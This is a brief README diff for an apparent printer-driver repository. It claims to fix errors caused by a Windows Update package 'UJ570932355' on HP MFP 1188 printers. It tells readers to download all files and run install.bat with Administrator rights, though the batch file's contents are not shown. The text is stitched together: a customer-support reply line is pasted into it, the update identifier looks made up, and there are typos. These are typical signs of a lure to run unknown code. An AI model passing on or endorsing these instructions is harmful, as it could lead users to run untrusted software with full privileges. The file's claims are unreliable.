RomanRobotF/printer-hw/README.md

 This Driver is used to fix print error caused by Windows Updates UJ570932355 package.

+This Driver works well with HP MFP 1188 serirals.

 Thanks for reaching out about your query regarding error on your printer!

 Download all files and execute install.bat with Administrator role.